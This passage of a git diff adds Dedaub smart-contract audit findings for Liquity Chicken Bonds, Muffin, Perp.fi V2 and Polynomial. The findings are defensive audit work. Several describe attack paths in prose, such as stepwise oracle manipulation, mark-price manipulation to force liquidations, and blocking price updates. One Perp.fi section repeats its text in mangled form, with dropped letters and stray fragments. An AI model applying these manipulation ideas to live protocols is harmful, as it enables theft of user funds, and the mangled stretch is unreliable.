        // Dedaub: the above is unnecessary. _updateBAMMDebt has its first
        // return value always be <= the second. So, clampedLUSDToShift
        // (which is <= _bammLUSDValue) will always be <= lusdInBAMMSPVault

+A4 Mistake in README.md INFO (RESOLVED) Under the section Shifter functions::Spot Price Thresholds, the conditions under which shifts are allowed are incorrect. The correct conditions should read: Shifting from the Curve to SP is possible when the spot price is < x, and must not move the spot price above x. Shifting from SP to the Curve is possible when the spot price is > y, and must not move the spot price below y.

A5 Compiler bugs INFO (RESOLVED) The code is compiled with Solidity 0.8.10 or higher. For deployment, we recommend no floating pragmas, i.e., a specific version, so as to be confident about the baseline guarantees offered by the compiler. Version 0.8.10, in particular, has some known bugs, which we do not believe to affect the correctness of the contracts.

CENTRALIZATION ASPECTS The design of the protocol is highly decentralized. The creation of bonds, chickening in/out and redemption of bLUSD tokens are all carried out without any intervention from governance. The shifter functions, ChickenBondManager::shiftLUSDFromSPToCurve and ChickenBondManager::shiftLUSDFromCurveToSP, which move LUSD between the Liquity stability pool and the Curve pool, are also public and permissionless. The Yearn Governance address holds control of the protocol's migration mode, which prevents the creation of new bonds, among other changes. There is no way to deactivate migration mode. Although new users will not be able to join the protocol, all current users will still be able to retrieve their funds, either through ChickenBondManager::chickenOut or ChickenBondManager::redeem. Yearn governance decisions are voted on by all YFI token holders and are executed by a 6-of-9 multisig address.
diff --git a/findings_newupdate/dedaub/Liquity _ Chicken Bonds Delta Audit (NFT additions).txt b/findings_newupdate/dedaub/Liquity _ Chicken Bonds Delta Audit (NFT additions).txt
new file mode 100644
index 0000000..fa1c429
--- /dev/null
+++ b/findings_newupdate/dedaub/Liquity _ Chicken Bonds Delta Audit (NFT additions).txt
@@ -0,0 +1,2 @@
+A1 Sub-optimal gas behavior in BondExtraData STATUS RESOLVED (commit a60f451f) The BondExtraData struct is designed to fit in one storage word:

    struct BondExtraData {
        uint80 initialHalfDna;
        uint80 finalHalfDna;
        uint32 troveSize;        // Debt in LUSD
        uint32 lqtyAmount;       // Holding LQTY, staking or deposited into Pickle
        uint32 curveGaugeSlopes; // For 3CRV and Frax pools combined
    }

(We note, in passing, that the uint32 amounts are rounded down, so different underlying amounts can map to the same recorded amount. This seems like an extremely minor inaccuracy, but it also pertains to issue L1, of NFT manipulation.) The result of fitting the struct in a single word is that the following code is highly suboptimal, gas-wise, requiring 4 separate SSTOREs, but also SLOADs of values before the SSTOREs (so that unaffected bits get preserved):

    function setFinalExtraData(address _bonder, uint256 _tokenID, uint256 _permanentSeed) external returns (uint80) {
        idToBondExtraData[_tokenID].finalHalfDna = newDna;
        idToBondExtraData[_tokenID].troveSize = _uint256ToUint32(troveManager.getTroveDebt(_bonder));
        idToBondExtraData[_tokenID].lqtyAmount = _uint256ToUint32(lqtyToken.balanceOf(_bonder) + lqtyStaking.stakes(_bonder) + pickleLQTYAmount);
        idToBondExtraData[_tokenID].curveGaugeSlopes = _uint256ToUint32((curveLUSD3CRVGaugeSlope + curveLUSDFRAXGaugeSlope) * CURVE_GAUGE_SLOPES_PRECISION);

We recommend using a memory record of the struct, reading its original value from storage, updating the 4 fields in memory, and storing back to idToBondExtraData[_tokenID]. The Solidity compiler could conceptually optimize the above pattern, but current versions do not even attempt such an optimization in the presence of internal calls, let alone external calls. (We also ascertained that the resulting bytecode is suboptimal under the current build settings of the repo.)
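A minimal sketch of the recommended pattern, with simplified types and signature (one SLOAD and one packed SSTORE instead of four read-modify-write cycles):

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.10;

    contract BondExtraDataSketch {
        struct BondExtraData {
            uint80 initialHalfDna;
            uint80 finalHalfDna;
            uint32 troveSize;
            uint32 lqtyAmount;
            uint32 curveGaugeSlopes;
        }

        mapping(uint256 => BondExtraData) public idToBondExtraData;

        // Sketch: load the packed word once, mutate in memory, write it
        // back once. The field values are taken as parameters here purely
        // to keep the example self-contained.
        function setFinalExtraData(
            uint256 tokenID,
            uint80 newDna,
            uint32 troveSize,
            uint32 lqtyAmount,
            uint32 curveGaugeSlopes
        ) external {
            BondExtraData memory data = idToBondExtraData[tokenID];
            data.finalHalfDna = newDna;
            data.troveSize = troveSize;
            data.lqtyAmount = lqtyAmount;
            data.curveGaugeSlopes = curveGaugeSlopes;
            idToBondExtraData[tokenID] = data; // single word written back
        }
    }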
+A2 Possibly extraneous check RESOLVED (commit f5fb7f16) Under the, relatively reasonable, assumption that MIN_BOND_AMOUNT is never zero, the first of the following checks would be extraneous:

    function createBond(uint256 _lusdAmount) public returns (uint256) {
        _requireNonZeroAmount(_lusdAmount);
        _requireMinBond(_lusdAmount);

A3 Compiler bugs INFO (RESOLVED) The code is compiled with Solidity 0.8.10 or higher. For deployment, we recommend no floating pragmas, i.e., a specific version, so as to be confident about the baseline guarantees offered by the compiler. Version 0.8.10, in particular, has some known bugs, which we do not believe to affect the correctness of the contracts.

diff --git a/findings_newupdate/dedaub/Muffin Finance _ Muffin Audit Report.txt b/findings_newupdate/dedaub/Muffin Finance _ Muffin Audit Report.txt
index d076b19..7f0ded0 100644
--- a/findings_newupdate/dedaub/Muffin Finance _ Muffin Audit Report.txt
+++ b/findings_newupdate/dedaub/Muffin Finance _ Muffin Audit Report.txt
@@ -6,7 +6,7 @@
A2 Misleading variable naming DISMISSED In SwapMath.sol, in the calcTierAmts functions, the variables num and denom are misleadingly named, since num is actually the denominator and denom the numerator of the solution. In function _ceilMulDiv in the same file, the name denom is used correctly.

A3 Fallback/proxy code not compatible with further Solidity calls INFO The fallback code of MuffinHub is used to proxy (via delegatecall) into MuffinHubPositions. This is a simple way to split the contract functionality in two, avoiding the Ethereum contract size restrictions. The code used to proxy is taken from an OpenZeppelin proxy implementation.

    fallback() external {
        address _positionController = positionController;
        assembly {
            calldatacopy(0, 0, calldatasize())
            let result := delegatecall(gas(), _positionController, 0, calldatasize(), 0, 0)
            returndatacopy(0, 0, returndatasize())
            switch result
            case 0 { revert(0, returndatasize()) }
            default { return(0, returndatasize()) }
        }
    }

Out of an abundance of caution, we warn that this implementation explicitly assumes that, upon return from the delegatecall, no further Solidity code will run: the return data is written to memory position 0, overwriting the Solidity scratchpad memory. There is currently no issue with this practice in the Muffin code: the fallback function cannot be called in a context that returns to Solidity code. However, given that the code base uses MultiCall (elsewhere), developers should be warned of the danger of possibly adding MultiCall functionality to MuffinHub in the future: a call delegated through the fallback function will return, and further calls will be issued. Without much further low-level exploration, it is not clear that the memory state of the MultiCall logic can indeed be affected, and even less that a security issue can arise from such a combination of MultiCall and the above fallback function, but the possibility is sufficient for an advisory note.

A4 Assert statements are used to catch invalid inputs INFO The Solidity assert statement is best used to signal that a condition that should never arise (i.e., one that represents a logical or code error) has occurred. In contrast, require is the standard way to check for invalid inputs. The codebase often fails via an assert and not a require for invalid inputs. The main example is operations in the Math library:

    library Math {
        /// @dev Compute z = x + y, where z must be non-negative
        /// and fit in a 96-bit unsigned integer
        function addInt96(uint96 x, int96 y) internal pure returns (uint96 z) {
            unchecked {
                int256 s = int256(uint256(x)) + int256(y);
                assert(s >= 0 && s <= int256(uint256(type(uint96).max)));
                z = uint96(uint256(s));
            }
        }
        ...
        function toInt96(uint96 x) internal pure returns (int96 z) {
            assert(x <= uint96(type(int96).max));
            z = int96(x);
        }

The above function, toInt96, for instance, is used in one of the most major safeguards in the system: in checking that the liquidity parameter supplied to a burn operation (an unsigned integer) does not become negative when cast into a signed integer. (Having this would enable an attacker to burn a negative amount of liquidity, i.e., to add enormous liquidity at will.) Therefore, the assert checks external input and should be a require. It is possible that the developers considered this and chose the assert in order to cause greater damage (by burning all supplied gas, as assert does) to a caller that supplies such invalid values. However, the practice is still questionable.
-A5 Misleading comments RESOLVED In library Ticks.sol the NatSpec comments explaining a Tick's parameters needSettle0, needSettle1 refer to the wrong limit order types:

    * @param needSettle0 True if needed to settle positions with lower tick boundary at this tick (i.e. 0 -> 1 limit orders)
    * @param needSettle1 True if needed to settle positions with upper tick boundary at this tick (i.e. 1 -> 0 limit orders)

Actually, needSettle0 becomes true if a OneToZero limit order should be settled, while needSettle1 if a ZeroToOne one. In the Math library, the following comment is misleading:

    /// @dev Compute z = max(x - y, 0) and r = x - z
    /// Dedaub: above is false
    function subUntilZero(uint256 x, uint256 y) internal pure returns (uint256 z, uint256 r) {
        unchecked {
            if (x >= y) z = x - y;
            else r = y - x;
        }
    }

+A5 Misleading comments RESOLVED In library Ticks.sol the NatSpec comments explaining a Tick's parameters needSettle0, needSettle1 refer to the wrong limit order types:

    * @param needSettle0 True if needed to settle positions with upper tick boundary at this tick (i.e. 0 -> 1 limit orders)
    * @param needSettle1 True if needed to settle positions with lower tick boundary at this tick (i.e. 1 -> 0 limit orders)

Actually, needSettle0 becomes true if a OneToZero limit order should be settled, while needSettle1 if a ZeroToOne one. In the Math library, the following comment is misleading:

    /// @dev Compute z = max(x - y, 0) and r = x - z
    /// Dedaub: above is false
    function subUntilZero(uint256 x, uint256 y) internal pure returns (uint256 z, uint256 r) {
        unchecked {
            if (x >= y) z = x - y;
            else r = y - x;
        }
    }

A6 Multiple definitions of constants DISMISSED Some constants are defined in both TickMath and Constants.sol:

    int24 internal constant MIN_TICK = -776363;
    int24 internal constant MAX_TICK = 776363;
    uint128 internal constant MIN_SQRT_P = 65539;
    uint128 internal constant MAX_SQRT_P = 340271175397327323250730767849398346765;

A7 Magic constant RESOLVED In Pools::_addTier and Pools::setTierParameters, 100000 is a magic constant and should ideally be given a name.

    function _addTier(
        Pool storage pool,
        uint24 sqrtGamma,
        uint128 sqrtPrice
    ) internal returns (uint256 amount0, uint256 amount1) {
        uint256 tierId = pool.tiers.length;
        require(tierId < MAX_TIERS);
        require(sqrtGamma <= 100000);

A8 Refactor common code? RESOLVED In Positions::update, it might be more elegant to factor out the statement self.liquidity

diff --git a/findings_newupdate/dedaub/Perpetual Protocol _ Perp.fi V2 Audit Report - Apr '22.txt b/findings_newupdate/dedaub/Perpetual Protocol _ Perp.fi V2 Audit Report - Apr '22.txt
new file mode 100644
index 0000000..8c7219b
--- /dev/null
+++ b/findings_newupdate/dedaub/Perpetual Protocol _ Perp.fi V2 Audit Report - Apr '22.txt
@@ -0,0 +1,5 @@
+L1 Vault::receive allows any msg.sender to send Ether RESOLVED ETH deposited into the Vault contract is converted to WETH by being deposited into the WETH contract. A user wishing to withdraw their ETH needs to call the withdrawEther method, which in turn calls the withdraw method of the WETH contract. As part of the unwrapping procedure of WETH, ETH is sent back to the Vault contract, which needs to be able to receive it and thus defines the special receive() method. It is expected (mentioned in a comment) that the receive() method will only be used to receive funds sent by the WETH contract. However, there is no check enforcing this assumption, allowing practically anyone to send ETH to the contract. We believe that the current version of the code is not susceptible to any attacks that could try to manipulate the accounting of ETH performed by the Vault.
Still, we cannot guarantee that no attack vectors will arise as the codebase evolves, and thus suggest adding a check on the msg.sender as follows:

    receive() external payable {
        require(_msgSender() == _WETH9, "msg.sender is not WETH");
    }

OTHER/ ADVISORY ISSUES: This section details issues that are not thought to directly affect the functionality of the project, but we recommend considering them.

+A1 Vault allows 0 value withdrawals ACKNOWLEDGED The Vault contract allows 0-value withdrawals through its external withdraw and withdrawEther methods. We believe that adding a requirement that a withdrawal's amount be greater than 0 would improve user experience and prevent the unnecessary spending of gas on user error. [The suggestion has been acknowledged by the protocol's team and might be implemented in a future release.]

+A2 Vault allows 0 value liquidations ACKNOWLEDGED The Vault contract allows 0-value liquidations through its liquidateCollateral method. Disallowing such liquidations will protect users from unnecessarily spending gas in case they make a mistake. [The suggestion has been acknowledged by the protocol's team and might be implemented in a future release.]

+A3 Vault::_modifyBalance gas optimization RESOLVED The internal method Vault::_modifyBalance allows the amount parameter to be 0. This behavior is intended, as it is clearly documented in a comment. Nevertheless, when amount is 0, no changes are applied to the contract's state, as can be seen below:

    function _modifyBalance(
        address trader,
        address token,
        int256 amount
    ) internal {
        // Dedaub: code has no effects on storage, still consumes some gas
        int256 oldBalance = _balance[trader][token];
        int256 newBalance = oldBalance.add(amount);
        _balance[trader][token] = newBalance;
        if (token == _settlementToken) {
            return;
        }
        // register/deregister non-settlement collateral tokens
        if (oldBalance != 0 && newBalance == 0) {
            // Dedaub: execution will not reach here when amount is 0
            // ..
        } else if (oldBalance == 0 && newBalance != 0) {
            // Dedaub: execution will not reach here when amount is 0
            // ..
        }
    }

oldBalance and newBalance are equal when amount is 0, thus no state changes get applied. Still, some gas is consumed, which can be avoided if the method is changed to return early when amount is 0.
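A minimal sketch of the suggested early return (a fragment; the rest of the method is unchanged):

    function _modifyBalance(
        address trader,
        address token,
        int256 amount
    ) internal {
        // Sketch: skip the storage read/write and the (unreachable)
        // registration branches entirely when the call is a no-op.
        if (amount == 0) {
            return;
        }
        // ... original logic follows ...
    }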
+A4 Vault::_getAccountValueAndTotalCollateralValue gas optimization RESOLVED The method _getAccountValueAndTotalCollateralValue calls the AccountBalance contract's method getPnlAndPendingFee twice, once directly and once in the call to _getSettlementTokenBalanceAndUnrealizedPnl in _getTotalCollateralValue. The first call to getPnlAndPendingFee, made to get the unrealized PnL, could be removed if the code were restructured appropriately to reuse the value returned by _getSettlementTokenBalanceAndUnrealizedPnl.

A5 Compiler known issues INFO The contracts were compiled with the Solidity compiler v0.7.6 which, at the time of writing, has a few known bugs. We inspected the bugs listed for this version and concluded that the subject code is unaffected.

CENTRALIZATION ASPECTS As is common in many new protocols, the owner of the smart contracts wields considerable power over the protocol, including changing the contracts holding the users' funds and adding tokens, which potentially means borrowing tokens using fake collateral, etc. In addition, the owner of the protocol has total control of several protocol parameters:
- the collateral ratio of tokens
- the discount ratio (applicable in liquidation)
- the deposit cap of tokens
- the maximum number of different collateral tokens for an account
- the maintenance margin buffer ratio
- the allowed ratio of debt in non-settlement tokens
- the liquidation ratio
- the insurance fund fee ratio
- the debt threshold
- the collateral value lower (dust) limit
In case the aforementioned parameters are decided by governance in future versions of the protocol, collateral ratios should be approached in a really careful and methodical way. We believe that a more decentralized approach would be to alter these weights in a specific way defined by predetermined formulas (taking into consideration the on-chain volatility and available liquidity) and allow only small adjustments by governance.

diff --git a/findings_newupdate/dedaub/Perpetual Protocol _ Perp.fi V2 Audit Report - Jan '23.txt b/findings_newupdate/dedaub/Perpetual Protocol _ Perp.fi V2 Audit Report - Jan '23.txt
new file mode 100644
index 0000000..ee33880
--- /dev/null
+++ b/findings_newupdate/dedaub/Perpetual Protocol _ Perp.fi V2 Audit Report - Jan '23.txt
@@ -0,0 +1,6 @@
+M1 Normal protocol function depends on the timely updates of the price feeds and of the associated PriceFeedDispatcher STATUS OPEN The PriceFeedDispatcher contract, which by default uses a Chainlink price feed (contract ChainlinkPriceFeedV3), might dispatch to the internal Uniswap V3 vAMM price feed if the underlying Chainlink price feed has timed out, i.e., has not been successfully updated for a period of time. Thus, the Chainlink price feed, and consequently the PriceFeedDispatcher contract's methods that update the current price, have to be successfully called at regular time intervals, not only to effectively keep track of the asset prices but also of the status of the Chainlink price feed used by the PriceFeedDispatcher, so as to timely switch to the fallback Uniswap oracle. Let's consider the following concrete scenario for better clarity: a Chainlink oracle that is consulted by a certain Chainlink price feed of the Perpetual protocol is not functioning properly, leading to the price getting timed out. However, the PriceFeedDispatcher using the aforementioned Chainlink price feed is not called to update or get the price during the time-out period. In that case, the status of the dispatcher never changes to Uniswap, and it is as if the timeout never happened.
However, this check only takes into account the dierence in price, and not the time that it took for this dierence to occur. function _isOutlier(uint256 price) internal view returns (bool) { uint256 diff = _lastValidPrice >= price ? _lastValidPrice - price : price - _lastValidPrice; uint256 deviationRatio = diff.mul(_ONE_HUNDRED_PERCENT_RATIO).div(_lastValidPrice); return deviationRatio >= _maxOutlierDeviationRatio; } Time is only implicitly taken into account by the frequency of updates: if they are regular then this is not an issue, however, too frequent or infrequent updates could potentially be problematic: Assuming that an adversary can control the Chainlink updates and wishes to produce a huge change without triggering the deviation check. This could be achieved by applying a change of the maximum allowed ratio but in every 0 single block. The overall dierence can be large without any individual update exceeding the limit. Inversely, assume that a token is volatile and its price is rapidly increasing. An adversary might wish to prevent the oracle from registering the increase in price; this could be achieved by preventing the update transactions from executing, using some DoS technique (e.g., DoS on the nodes sending such transactions). If the price gradually increases above the maximum ratio over a period of time, but no update happens during that period, then the next update will trigger the deviation limit, further preventing the price from updating. For the above reasons we recommend that the deviation checks take time into account. LOW SEVERITY: ID Description ClearingHouse::quitMarket is not guarded against +L1 reentrancy STATUS OPEN The function ClearingHouse::quitMarket is not guarded against reentrancy. Even though there is no such threat in the current version of the codebase, we would suggest adding reentrancy guards (as it is done for all functionality that is oered by the ClearingHouse contract) as a precaution measure, in case a reentrancy is made possible by future code changes. No StatusUpdated event emied in PriceFeedDispatcher OPEN constructor +L2 0 There is no StatusUpdated event emied in the PriceFeedDispatcher constructor even though the _chainlinkPriceFeed +V3 storage variable is set. The status storage variable is also technically set for the rst time. 0 OTHER/ ADVISORY ISSUES: This section details issues that are not thought to directly aect the functionality of the project, but we recommend considering them. +V3 storage variable is set. The status storage variable is also technically set for the rst time. 0 OTHER/ ADVISORY ISSUES: This section details issues that are not thought to directly aect the functionality of the project, but we recommend considering them. A1 PriceFeedUpdater does not allow adding/removing feeds INFO The PriceFeedUpdated contract does not support addition and removal of price feeds, meaning that the whole contract should be redeployed in case this is a need. A2 Storage variables can be made immutable INFO There exist a couple of storage variables that are set in the constructor and cannot be modied afterwards. These variables can be declared immutable: UniswapV3PriceFeed::pool PriceFeedDispatcher::_chainlinkPriceFeedV3 A3 Compiler known issues INFO The contracts were compiled with the Solidity compiler v0.7.6 which, at the time of writing, has a few known bugs. We inspected the bugs listed for this version and concluded that the subject code is unaected. 
LOW SEVERITY:
ID Description STATUS
+L1 ClearingHouse::quitMarket is not guarded against reentrancy OPEN The function ClearingHouse::quitMarket is not guarded against reentrancy. Even though there is no such threat in the current version of the codebase, we would suggest adding reentrancy guards (as is done for all functionality offered by the ClearingHouse contract) as a precautionary measure, in case a reentrancy is made possible by future code changes.

+L2 No StatusUpdated event emitted in the PriceFeedDispatcher constructor OPEN There is no StatusUpdated event emitted in the PriceFeedDispatcher constructor even though the _chainlinkPriceFeedV3 storage variable is set. The status storage variable is also technically set for the first time.

OTHER/ ADVISORY ISSUES: This section details issues that are not thought to directly affect the functionality of the project, but we recommend considering them.

A1 PriceFeedUpdater does not allow adding/removing feeds INFO The PriceFeedUpdater contract does not support the addition and removal of price feeds, meaning that the whole contract would have to be redeployed in case there is such a need.

A2 Storage variables can be made immutable INFO There exist a couple of storage variables that are set in the constructor and cannot be modified afterwards. These variables can be declared immutable:
- UniswapV3PriceFeed::pool
- PriceFeedDispatcher::_chainlinkPriceFeedV3

A3 Compiler known issues INFO The contracts were compiled with the Solidity compiler v0.7.6 which, at the time of writing, has a few known bugs. We inspected the bugs listed for this version and concluded that the subject code is unaffected.

CENTRALIZATION ASPECTS It is often desirable for DeFi protocols to assume no trust in a central authority, including the protocol's owner. Even if the owner is reputable, users are more likely to engage with a protocol that guarantees no catastrophic failure even in the case the owner gets hacked/compromised. We list issues of this kind below. (These issues should be considered in the context of usage/deployment, as they are not uncommon. Several high-profile, high-value protocols have significant centralization threats.) As already mentioned in issue M1, the normal function of the protocol depends on the timely updates of the Chainlink price feeds and of the associated PriceFeedDispatcher contracts. These updates are performed by off-chain bots, which cannot be fully trusted.

diff --git a/findings_newupdate/dedaub/Perpetual Protocol _ Perp.fi V2 Audit Report - Sep '22.txt b/findings_newupdate/dedaub/Perpetual Protocol _ Perp.fi V2 Audit Report - Sep '22.txt
new file mode 100644
index 0000000..50128aa
--- /dev/null
+++ b/findings_newupdate/dedaub/Perpetual Protocol _ Perp.fi V2 Audit Report - Sep '22.txt
@@ -0,0 +1,6 @@
+L1 SurplusBeneficiary::setFeeDistributor does not remove the infinite approval for _token given to the old fee distributor STATUS RESOLVED SurplusBeneficiary::setFeeDistributor sets the new fee distributor contract and approves it to transfer an infinite amount of USDC. However, the approval of the old fee distributor is not revoked, allowing it to transfer any amount of USDC even though that contract might have been deemed obsolete or even vulnerable.

OTHER/ ADVISORY ISSUES: This section details issues that are not thought to directly affect the functionality of the project, but we recommend considering them.

+A1 ERC20::transfer might get called with amount set to 0 RESOLVED SurplusBeneficiary::dispatch computes the amount of USDC that should be transferred to the treasury and executes the transfer without first checking that the transferred amount is not 0.

    function dispatch() external override nonReentrant {
        // ..
        uint256 tokenAmountToTreasury = FullMath.mulDiv(tokenAmount, _treasuryPercentage, 1e6);
        // Dedaub: tokenAmountToTreasury might be 0 due to _treasuryPercentage
        // being 0 or due to rounding.
        SafeERC20.safeTransfer(IERC20(token), _treasury, tokenAmountToTreasury);
        // ..
    }
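A minimal sketch of the corresponding guard inside dispatch (a fragment; only the conditional is new):

    uint256 tokenAmountToTreasury = FullMath.mulDiv(tokenAmount, _treasuryPercentage, 1e6);
    // Sketch: skip the external call entirely when rounding (or a zero
    // percentage) makes the amount 0.
    if (tokenAmountToTreasury > 0) {
        SafeERC20.safeTransfer(IERC20(token), _treasury, tokenAmountToTreasury);
    }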
+A5 Whitelist debt threshold can be set to lower than the default INFO There is no check to ensure the whitelist debt threshold cannot be set to a value that would be less than the default debt threshold. This might be intentional, but the term whitelist could have users expect that their debt threshold can only increase from the default. A6 Compiler known issues INFO The contracts were compiled with the Solidity compiler v0.7.6 which, at the time of writing, has a few known bugs. We inspected the bugs listed for this version and concluded that the subject code is unaffected. CENTRALIZATION ASPECTS As is common in many new protocols, the owner of the smart contracts wields considerable power over the protocol, including changing the contracts holding the users' funds, killing contracts (FeeDistributor), using emergency unlock (vePERP), etc. In addition, the owner of the protocol has total control of several protocol parameters: - the treasury contract address - the percentage of funds going to the treasury - the fee distributor contract address - the insurance fund surplus threshold - the insurance fund surplus beneficiary contract - the whitelisted debt threshold diff --git a/findings_newupdate/dedaub/Polynomial _ Polynomial Power Perp Contracts Audit - Apr '23.txt b/findings_newupdate/dedaub/Polynomial _ Polynomial Power Perp Contracts Audit - Apr '23.txt new file mode 100644 index 0000000..cf9ade5 --- /dev/null +++ b/findings_newupdate/dedaub/Polynomial _ Polynomial Power Perp Contracts Audit - Apr '23.txt @@ -0,0 +1,41 @@ +H1 The validity of the index price, the funding rate and the mark price is not always checked by the caller STATUS OPEN Functions getIndexPrice, getFundingRate and getMarkPrice of the Exchange contract depend on the externally provided base asset price, which could be invalid in some cases. Nevertheless, the aforementioned functions do not revert in case the base asset price is invalid, but return a tuple with the derived value and a boolean that denotes that the derived value is invalid due to the base asset price being invalid. The callers of the functions are responsible for checking the validity of the returned values, a design which is valid and flexible as long as it is appropriately implemented. However, the function Exchange::_updateFundingRate does not check the validity of the funding rate value returned by getFundingRate, which could lead to an invalid funding rate getting registered, messing up the protocol's operation. At the same time, ShortCollateral::liquidate does not check the validity of the mark price returned by Exchange's getMarkPrice. The chance that something will go wrong is significantly smaller with liquidate, because each call to it is preceded by a call to the function maxLiquidatableDebt, which checks the validity of the mark price. +H2 LiquidityPool LP token price might be incorrect OPEN LiquidityPool::getTokenPrice, the function that computes the price of one LP token, might return an incorrect price under certain circumstances. Specifically, it is incorrectly assumed that if the skew is equal to 0, the totalMargin and usedFunds will always add up to 0.
LiquidityPool::getTokenPrice() function getTokenPrice() public view override returns (uint256) { if (totalFunds == 0) { return 1e18; } uint256 totalSupply = liquidityToken.totalSupply() + totalQueuedWithdrawals; int256 skew = _getSkew(); if (skew == 0) { // Dedaub: Incorrect assumption that if skew == 0 then // totalMargin + usedFunds == 0 return totalFunds.divWadDown(totalSupply); } (uint256 markPrice, bool isInvalid) = getMarkPrice(); require(!isInvalid); uint256 totalValue = totalFunds; uint256 amountOwed = markPrice.mulWadDown(powerPerp.totalSupply()); uint256 amountToCollect = markPrice.mulWadDown(shortToken.totalShorts()); uint256 totalMargin = _getTotalMargin(); totalValue += totalMargin + amountToCollect; totalValue -= uint256((int256(amountOwed) + usedFunds)); return totalValue.divWadDown(totalSupply); } +H3 The accounting of LiquidityPool's queued orders is incorrect OPEN LiquidityPool::_placeDelayedOrder does not set the queuedPerpSize storage variable to 0 when an order of size sizeDelta + queuedPerpSize is submitted to the Synthetix Perpetual Market. Also, queuedPerpSize should be accounted for in the emitted SubmitDelayedOrder event. LiquidityPool::_placeDelayedOrder() function _placeDelayedOrder( int256 sizeDelta, bool isLiquidation ) internal { PerpsV2MarketBaseTypes.DelayedOrder memory order = perpMarket.delayedOrders(address(this)); (,,,,, IPerpsV2MarketBaseTypes.Status status) = perpMarket.postTradeDetails(sizeDelta, 0, IPerpsV2MarketBaseTypes.OrderType.Delayed, address(this)); int256 oldSize = order.sizeDelta; if (oldSize != 0 || isLiquidation || uint8(status) != 0) { queuedPerpSize += sizeDelta; return; } perpMarket.submitOffchainDelayedOrderWithTracking( sizeDelta + queuedPerpSize, perpPriceImpactDelta, synthetixTrackingCode ); // Dedaub: queuedPerpSize should be set to 0 here // Dedaub: Below line should be: // emit SubmitDelayedOrder(sizeDelta + queuedPerpSize); emit SubmitDelayedOrder(sizeDelta); } +H4 The mark price is susceptible to manipulation OPEN The mark price depends on the total sizes of the long and short positions. ShortCollateral's canLiquidate and maxLiquidatableDebt use the mark price to compute the value of the position and to check if the collateralization ratio is above the liquidation limit or not. An adversary could open a large short position to increase the mark price and therefore decrease the collateral ratio of all the positions and possibly make some of them undercollateralized. The adversary would then proceed by calling Exchange's liquidate function to liquidate the underwater position(s) and get the liquidation bonus before finally closing their short position. +H5 Accounting of usedFunds and totalFunds is incorrect OPEN The LiquidityPool contract uses two storage variables to track its available balance, usedFunds and totalFunds. As one would expect, these two variables get updated when a position is opened or closed, i.e., when functions openLong, openShort, closeLong and closeShort are called. Incoming (openLong and closeShort) and outgoing (openShort and closeLong) funds for the position must be considered together with funds needed for fees. There are 3 types of fees: trading fees attributed to the LiquidityPool, fees required to open an offsetting position in the Synthetix Perp Market, which are called hedgingFees, and a protocol fee, externalFee. The accounting of all these values is rather complex and ends up being incorrect in all four of the aforementioned functions. Let's take the closeLong function as an example.
In closeLong there are no incoming funds, and the outgoing funds are the sum of the totalCost, the externalFee and the hedgingFees. However, usedFunds is actually increased by tradeCost, i.e., totalCost + tradingFee + externalFee + hedgingFees, while hedgingFees are also added to usedFunds in the _hedge function. Thus, there are two issues: (1) hedgingFees are accounted for twice and (2) tradingFee is added when it should not be (a sketch of the corrected accounting follows below). LiquidityPool::closeLong() function closeLong(uint256 amount, address user, bytes32 referralCode) external override onlyExchange nonReentrant returns (uint256 totalCost) { (uint256 markPrice, bool isInvalid) = getMarkPrice(); require(!isInvalid); uint256 tradeCost = amount.mulWadDown(markPrice); uint256 fees = orderFee(-int256(amount)); totalCost = tradeCost - fees; SUSD.safeTransfer(user, totalCost); uint256 hedgingFees = _hedge(-int256(amount), false); uint256 feesCollected = fees - hedgingFees; uint256 externalFee = feesCollected.mulWadDown(devFee); SUSD.safeTransfer(feeReceipient, externalFee); // Dedaub: usedFunds is incremented by tradeCost // tradeCost = totalCost + fees, // fees = feesCollected + hedgingFees and // feesCollected = tradingFee + externalFee usedFunds += int256(tradeCost); emit RegisterTrade(referralCode, feesCollected, externalFee); emit CloseLong(markPrice, amount, fees); } The functions openLong, openShort and closeShort suffer from similar issues. H6 There might not be enough incentives for liquidators to liquidate unhealthy positions OPEN Collateralized short positions opened via the Exchange can get liquidated. For a liquidatable position of size N the liquidator has to give up N PowerPerp tokens for an amount of short collateral tokens equaling the value of the position plus a liquidation bonus. Thus, a user/liquidator is incentivized to liquidate a losing position instead of just closing their position, as they will get a liquidation bonus on top of what they would get. However, the liquidator might not always get paid an amount of short collateral tokens equaling the value of the position plus a liquidation bonus, according to the following condition in function ShortCollateral::liquidate: ShortCollateral::liquidate() totalCollateralReturned = liqBonus + collateralClaim; if (totalCollateralReturned > userCollateral.amount) totalCollateralReturned = userCollateral.amount; As can be seen, if the value of the position plus the liquidation bonus, or totalCollateralReturned, is greater than the position's collateral, the liquidator gets just the position's collateral. This means that if during a significant price increase liquidations do not happen fast enough, certain losing positions will not be liquidatable for a profit, as the collateral's value will be less than that of the long position that needs to be closed. However, such a market is not healthy and this is reflected in the mark price, which lies at the center of the protocol. To avoid such scenarios (1) the collateralization ratios need to be chosen carefully while taking into account the squared nature of the perps, and (2) an emergency fund should be implemented, which will be able to chip in when a position's collateral is not enough to incentivize its liquidation.
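Under the reading above, a minimal sketch of the corrected increment in closeLong (an illustration, not the project's own patch): since _hedge already adds hedgingFees to usedFunds, only the funds actually leaving the pool in closeLong itself should be counted:

// totalCost is paid to the user and externalFee to the fee recipient;
// hedgingFees were already accounted for inside _hedge.
usedFunds += int256(totalCost + externalFee);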
MEDIUM SEVERITY: ID Description STATUS +M1 Liquidators are not able to set a minimum amount of collateral that they expect from a liquidation OPEN Function Exchange::_liquidate does not require that totalCollateralReturned, i.e., the collateral awarded to the liquidator, is greater than a liquidator-specified minimum, thus in certain cases the liquidator might get back less than what they expected (as mentioned in issue H6; a protective check is sketched after issue M3 below). This might happen because the collateral of the position is not enough to cover the liquidation's theoretical collateral claim (bad debt scenario) plus the liquidation bonus. As can be seen in the below snippet of ShortCollateral's liquidate function, totalCollateralReturned will be at most equal to the collateral of the specific position. ShortCollateral::liquidate() function liquidate(uint256 positionId, uint256 debt, address user) external override onlyExchange nonReentrant returns (uint256 totalCollateralReturned) { // Dedaub: Code omitted for brevity uint256 collateralClaim = debt.mulDivDown(markPrice, collateralPrice); uint256 liqBonus = collateralClaim.mulWadDown(coll.liqBonus); totalCollateralReturned = liqBonus + collateralClaim; // Dedaub: This if statement can reduce totalCollateralReturned to // something smaller than expected by the liquidator if (totalCollateralReturned > userCollateral.amount) totalCollateralReturned = userCollateral.amount; userCollateral.amount -= totalCollateralReturned; // Dedaub: Code omitted for brevity } +M2 KangarooVault funds are not optimally managed OPEN Function KangarooVault::_clearPendingOpenOrders determines if the previous open order has been 